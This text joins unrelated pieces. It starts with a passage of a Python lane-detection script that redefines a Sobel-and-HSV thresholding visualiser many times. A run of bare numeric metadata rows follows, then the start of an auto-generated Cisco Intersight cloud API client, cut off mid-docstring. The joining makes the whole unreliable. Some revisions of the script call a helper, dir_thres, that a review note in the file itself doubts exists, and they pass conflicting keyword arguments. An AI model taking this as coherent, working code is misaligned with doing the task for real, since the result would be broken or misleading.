    panels[2].imshow(grad_x, cmap="gray")
    panels[3].imshow(grad_y, cmap="gray")
    panels[4].imshow(dir_mask, cmap="gray")
    panels[5].imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
# Exercise the latest sobel_plus_hsv_test over all test images (run twice
# in the session).
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Eight-panel (2x4) diagnostic adding the magnitude mask; last panel left blank."""
    processed = pipeline(inp_img)
    grad_x = abs_sobel_thresh(processed, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grad_y = abs_sobel_thresh(processed, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(processed, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(processed, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((grad_x == 1) & (grad_y == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    fig, axes = plt.subplots(2, 4, figsize=(24, 9))
    fig.tight_layout()
    panels = [ax for row in axes for ax in row]
    panels[0].imshow(inp_img)
    panels[1].imshow(processed)
    panels[2].imshow(grad_x, cmap="gray")
    panels[3].imshow(grad_y, cmap="gray")
    panels[4].imshow(mag_mask, cmap="gray")
    panels[5].imshow(dir_mask, cmap="gray")
    panels[6].imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
# Render the eight-panel diagnostic for each test image.
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Eight-panel diagnostic; additionally returns the combined binary mask."""
    processed = pipeline(inp_img)
    grad_x = abs_sobel_thresh(processed, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grad_y = abs_sobel_thresh(processed, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(processed, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(processed, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((grad_x == 1) & (grad_y == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    fig, axes = plt.subplots(2, 4, figsize=(24, 9))
    fig.tight_layout()
    panels = [ax for row in axes for ax in row]
    panels[0].imshow(inp_img)
    panels[1].imshow(processed)
    panels[2].imshow(grad_x, cmap="gray")
    panels[3].imshow(grad_y, cmap="gray")
    panels[4].imshow(mag_mask, cmap="gray")
    panels[5].imshow(dir_mask, cmap="gray")
    panels[6].imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
def sobel_plus_hsv_output(inp_img, ksize=5):
    """Same stages as sobel_plus_hsv_test: pipeline + gradient thresholds,
    diagnostic plot, combined binary mask returned."""
    piped = pipeline(inp_img)
    sobel_x = abs_sobel_thresh(piped, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    sobel_y = abs_sobel_thresh(piped, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    magnitude = mag_thresh(piped, sobel_kernel=ksize, mag_thresh=(30, 100))
    direction = dir_threshold(piped, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(direction)
    selected = ((sobel_x == 1) & (sobel_y == 1)) | ((magnitude == 1) & (direction == 1))
    combined[selected] = 1
    fig, axes = plt.subplots(2, 4, figsize=(24, 9))
    fig.tight_layout()
    stages = [(inp_img, None), (piped, None), (sobel_x, "gray"), (sobel_y, "gray"),
              (magnitude, "gray"), (direction, "gray"), (combined, "gray")]
    for ax, (img, cm) in zip(axes.flat, stages):
        if cm is None:
            ax.imshow(img)
        else:
            ax.imshow(img, cmap=cm)
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
    """Parameterised pipeline + Sobel threshold visualiser.

    All ``*_thresh`` keywords are (low, high) windows forwarded to the
    respective helpers.  Plots every stage and returns the combined mask.
    """
    # Bug fix: the ``mag_thresh`` parameter shadows the module-level
    # mag_thresh() helper, so the original body raised
    # "TypeError: 'tuple' object is not callable" on every invocation.
    # Recover the helper from the module namespace so the public keyword
    # name stays unchanged for callers.
    mag_thresh_fn = globals()['mag_thresh']
    image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
    mag_binary = mag_thresh_fn(image, sobel_kernel=ksize, mag_thresh=mag_thresh)
    dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=dir_thresh)
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(mag_binary, cmap="gray")
    ax6.imshow(dir_binary, cmap="gray")
    ax7.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
# Exercise the latest revision on each calibration/test image.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
    """Parameterised pipeline + Sobel threshold visualiser; returns the mask.

    Fixes over the original body:
    1. The ``mag_thresh`` parameter shadowed the module-level mag_thresh()
       helper -> "'tuple' object is not callable"; the helper is recovered
       via globals() so the public keyword name is preserved.
    2. The helper takes its window via the ``mag_thresh`` keyword (see the
       earlier working call in this file), not ``thresh``.
    """
    mag_thresh_fn = globals()['mag_thresh']
    image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
    mag_binary = mag_thresh_fn(image, sobel_kernel=ksize, mag_thresh=mag_thresh)
    # NOTE(review): earlier revisions call dir_threshold(); confirm that
    # dir_thres() actually exists in main before relying on this cell.
    dir_binary = dir_thres(image, sobel_kernel=ksize, thresh=dir_thresh)
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(mag_binary, cmap="gray")
    ax6.imshow(dir_binary, cmap="gray")
    ax7.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
from main import *
# Re-check every test image after re-importing helpers from main.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
from main import *
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
    """Parameterised pipeline + Sobel threshold visualiser; returns the mask.

    Fixes over the original body:
    1. The ``mag_thresh`` parameter shadowed the module-level mag_thresh()
       helper -> "'tuple' object is not callable"; the helper is recovered
       via globals() so the public keyword name is preserved.
    2. The helper takes its window via the ``mag_thresh`` keyword (see the
       earlier working call in this file), not ``thresh``.
    """
    mag_thresh_fn = globals()['mag_thresh']
    image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
    mag_binary = mag_thresh_fn(image, sobel_kernel=ksize, mag_thresh=mag_thresh)
    # NOTE(review): earlier revisions call dir_threshold(); confirm that
    # dir_thres() actually exists in main before relying on this cell.
    dir_binary = dir_thres(image, sobel_kernel=ksize, thresh=dir_thresh)
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(mag_binary, cmap="gray")
    ax6.imshow(dir_binary, cmap="gray")
    ax7.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
# Run the updated function over the test images again.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
    """Parameterised pipeline + Sobel threshold visualiser; returns the mask.

    Bug fix: the ``mag_binary`` computation was commented out while the
    variable was still referenced in the combination mask and in the plot,
    so every call raised NameError.  The computation is restored; the
    helper is fetched via globals() because the ``mag_thresh`` parameter
    shadows the module-level mag_thresh() function of the same name.
    """
    image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
    mag_binary = globals()['mag_thresh'](image, sobel_kernel=ksize, mag_thresh=mag_thresh)
    # NOTE(review): earlier revisions call dir_threshold(); confirm that
    # dir_thres() actually exists in main before relying on this cell.
    dir_binary = dir_thres(image, sobel_kernel=ksize, thresh=dir_thresh)
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(mag_binary, cmap="gray")
    ax6.imshow(dir_binary, cmap="gray")
    ax7.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
# Another pass of the visual check over all test images.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
    """Parameterised pipeline + Sobel threshold visualiser; returns the mask.

    Bug fixes over the original body:
    1. ``mag_binary`` was commented out while still referenced below ->
       NameError on every call; the computation is restored via a globals()
       lookup because the ``mag_thresh`` parameter shadows the helper.
    2. ``dir_binary = dir_thresh(...)`` called the *parameter* (a tuple) ->
       "'tuple' object is not callable"; restored to the dir_threshold()
       helper used by the earlier working revision in this file.
    """
    image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
    mag_binary = globals()['mag_thresh'](image, sobel_kernel=ksize, mag_thresh=mag_thresh)
    dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=dir_thresh)
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(mag_binary, cmap="gray")
    ax6.imshow(dir_binary, cmap="gray")
    ax7.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
# Visual regression pass across the test-image set.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
from main import *
# Re-run after re-importing helpers from main.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
    """Parameterised pipeline + Sobel threshold visualiser; returns the mask.

    Bug fixes over the original body: both the ``mag_thresh`` and
    ``dir_thresh`` parameters shadowed the module-level helper functions of
    the same names, so both calls raised "'tuple' object is not callable".
    The magnitude helper is recovered via globals() (keyword restored to
    ``mag_thresh=`` as in the earlier working call); the direction call is
    restored to the dir_threshold() helper used by the working revision.
    """
    image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
    mag_binary = globals()['mag_thresh'](image, sobel_kernel=ksize, mag_thresh=mag_thresh)
    dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=dir_thresh)
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(mag_binary, cmap="gray")
    ax6.imshow(dir_binary, cmap="gray")
    ax7.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
# Check the current revision on every sample image.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
    """Parameterised pipeline + Sobel threshold visualiser; returns the mask.

    Bug fixes over the original body:
    1. The gradx and grady assignments were fused onto one line -> SyntaxError;
       split back into two statements.
    2. The ``mag_thresh`` and ``dir_thresh`` parameters shadowed the helper
       functions of the same names -> "'tuple' object is not callable";
       the magnitude helper is recovered via globals() (keyword restored to
       ``mag_thresh=``) and the direction call uses dir_threshold() as in
       the earlier working revision.
    """
    image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
    mag_binary = globals()['mag_thresh'](image, sobel_kernel=ksize, mag_thresh=mag_thresh)
    dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=dir_thresh)
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(mag_binary, cmap="gray")
    ax6.imshow(dir_binary, cmap="gray")
    ax7.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Colour pipeline + gradient thresholds; plots stages, returns mask."""
    staged = pipeline(inp_img)
    gx = abs_sobel_thresh(staged, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    gy = abs_sobel_thresh(staged, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(staged, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(staged, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((gx == 1) & (gy == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    fig, axes = plt.subplots(2, 4, figsize=(24, 9))
    fig.tight_layout()
    colour_panels = [inp_img, staged]
    gray_panels = [gx, gy, mag_mask, dir_mask, combined]
    flat = list(axes.flat)
    for ax, img in zip(flat[:2], colour_panels):
        ax.imshow(img)
    for ax, img in zip(flat[2:], gray_panels):
        ax.imshow(img, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
# Sanity-check the simplified revision on all images.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Colour pipeline + gradient thresholds; plots stages, returns mask.

    NOTE(review): this revision passes the magnitude window as ``thresh=``
    where an earlier cell used ``mag_thresh=`` — confirm which keyword the
    current mag_thresh() helper in main expects.
    """
    staged = pipeline(inp_img)
    gx = abs_sobel_thresh(staged, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    gy = abs_sobel_thresh(staged, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(staged, sobel_kernel=ksize, thresh=(30, 100))
    dir_mask = dir_threshold(staged, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((gx == 1) & (gy == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    fig, axes = plt.subplots(2, 4, figsize=(24, 9))
    fig.tight_layout()
    panels = [(inp_img, None), (staged, None), (gx, "gray"), (gy, "gray"),
              (mag_mask, "gray"), (dir_mask, "gray"), (combined, "gray")]
    for ax, (img, cm) in zip(axes.flat, panels):
        if cm is None:
            ax.imshow(img)
        else:
            ax.imshow(img, cmap=cm)
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
    return combined
# Final pass over the test images, then stop the script.
for img_path in image_list:
    sobel_plus_hsv_test(mpimg.imread(img_path))
exit()
| 44.552326
| 169
| 0.685458
| 3,638
| 22,989
| 4.095107
| 0.032435
| 0.064975
| 0.094509
| 0.109276
| 0.939522
| 0.930192
| 0.919184
| 0.918647
| 0.912136
| 0.910726
| 0
| 0.052168
| 0.156162
| 22,989
| 515
| 170
| 44.638835
| 0.71581
| 0
| 0
| 0.880753
| 0
| 0
| 0.019535
| 0.001445
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.018828
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c222e262b3c2b7b11346e165629d2e69b71b5eaf
| 308,546
|
py
|
Python
|
intersight/api/cloud_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/api/cloud_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/api/cloud_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.api_client import ApiClient, Endpoint as _Endpoint
from intersight.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from intersight.model.cloud_aws_billing_unit import CloudAwsBillingUnit
from intersight.model.cloud_aws_billing_unit_response import CloudAwsBillingUnitResponse
from intersight.model.cloud_aws_key_pair import CloudAwsKeyPair
from intersight.model.cloud_aws_key_pair_response import CloudAwsKeyPairResponse
from intersight.model.cloud_aws_network_interface import CloudAwsNetworkInterface
from intersight.model.cloud_aws_network_interface_response import CloudAwsNetworkInterfaceResponse
from intersight.model.cloud_aws_organizational_unit import CloudAwsOrganizationalUnit
from intersight.model.cloud_aws_organizational_unit_response import CloudAwsOrganizationalUnitResponse
from intersight.model.cloud_aws_security_group import CloudAwsSecurityGroup
from intersight.model.cloud_aws_security_group_response import CloudAwsSecurityGroupResponse
from intersight.model.cloud_aws_subnet import CloudAwsSubnet
from intersight.model.cloud_aws_subnet_response import CloudAwsSubnetResponse
from intersight.model.cloud_aws_virtual_machine import CloudAwsVirtualMachine
from intersight.model.cloud_aws_virtual_machine_response import CloudAwsVirtualMachineResponse
from intersight.model.cloud_aws_volume import CloudAwsVolume
from intersight.model.cloud_aws_volume_response import CloudAwsVolumeResponse
from intersight.model.cloud_aws_vpc import CloudAwsVpc
from intersight.model.cloud_aws_vpc_response import CloudAwsVpcResponse
from intersight.model.cloud_collect_inventory import CloudCollectInventory
from intersight.model.cloud_regions import CloudRegions
from intersight.model.cloud_regions_response import CloudRegionsResponse
from intersight.model.cloud_sku_container_type import CloudSkuContainerType
from intersight.model.cloud_sku_container_type_response import CloudSkuContainerTypeResponse
from intersight.model.cloud_sku_database_type import CloudSkuDatabaseType
from intersight.model.cloud_sku_database_type_response import CloudSkuDatabaseTypeResponse
from intersight.model.cloud_sku_instance_type import CloudSkuInstanceType
from intersight.model.cloud_sku_instance_type_response import CloudSkuInstanceTypeResponse
from intersight.model.cloud_sku_network_type import CloudSkuNetworkType
from intersight.model.cloud_sku_network_type_response import CloudSkuNetworkTypeResponse
from intersight.model.cloud_sku_region_rate_cards import CloudSkuRegionRateCards
from intersight.model.cloud_sku_region_rate_cards_response import CloudSkuRegionRateCardsResponse
from intersight.model.cloud_sku_volume_type import CloudSkuVolumeType
from intersight.model.cloud_sku_volume_type_response import CloudSkuVolumeTypeResponse
from intersight.model.cloud_tfc_agentpool import CloudTfcAgentpool
from intersight.model.cloud_tfc_agentpool_response import CloudTfcAgentpoolResponse
from intersight.model.cloud_tfc_organization import CloudTfcOrganization
from intersight.model.cloud_tfc_organization_response import CloudTfcOrganizationResponse
from intersight.model.cloud_tfc_workspace import CloudTfcWorkspace
from intersight.model.cloud_tfc_workspace_response import CloudTfcWorkspaceResponse
from intersight.model.error import Error
class CloudApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
"""Bind this API wrapper to *api_client*; create a default ApiClient when omitted."""
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_cloud_collect_inventory(
self,
cloud_collect_inventory,
**kwargs
):
"""Create a 'cloud.CollectInventory' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cloud_collect_inventory(cloud_collect_inventory, async_req=True)
>>> result = thread.get()
Args:
cloud_collect_inventory (CloudCollectInventory): The 'cloud.CollectInventory' resource to create.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
if_none_match (str): For methods that apply server-side changes, If-None-Match used with the * value can be used to create a resource not known to exist, guaranteeing that another resource creation didn't happen before, losing the data of the previous put. The request will be processed only if the eventually existing resource's ETag doesn't match any of the values listed. Otherwise, the status code 412 (Precondition Failed) is used. The asterisk is a special value representing any resource. It is only useful when creating a resource, usually with PUT, to check if another resource with the identity has already been created before. The comparison with the stored ETag uses the weak comparison algorithm, meaning two resources are considered identical if the content is equivalent - they don't have to be identical byte for byte.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudCollectInventory
If the method is called asynchronously, returns the request
thread.
"""
# Fill in defaults for every transport/validation switch the caller did
# not supply, then delegate to the _Endpoint machinery.
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
# The request body is received positionally; forward it as a keyword.
kwargs['cloud_collect_inventory'] = \
cloud_collect_inventory
return self.call_with_http_info(**kwargs)
# Auto-generated endpoint descriptor: binds the POST
# /api/v1/cloud/CollectInventories operation (auth schemes, parameter
# typing/locations, content negotiation) to the private callable above.
self.create_cloud_collect_inventory = _Endpoint(
settings={
'response_type': (CloudCollectInventory,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/CollectInventories',
'operation_id': 'create_cloud_collect_inventory',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'cloud_collect_inventory',
'if_match',
'if_none_match',
],
'required': [
'cloud_collect_inventory',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'cloud_collect_inventory':
(CloudCollectInventory,),
'if_match':
(str,),
'if_none_match':
(str,),
},
'attribute_map': {
'if_match': 'If-Match',
'if_none_match': 'If-None-Match',
},
'location_map': {
'cloud_collect_inventory': 'body',
'if_match': 'header',
'if_none_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_cloud_collect_inventory
)
def __get_cloud_aws_billing_unit_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsBillingUnit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_billing_unit_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
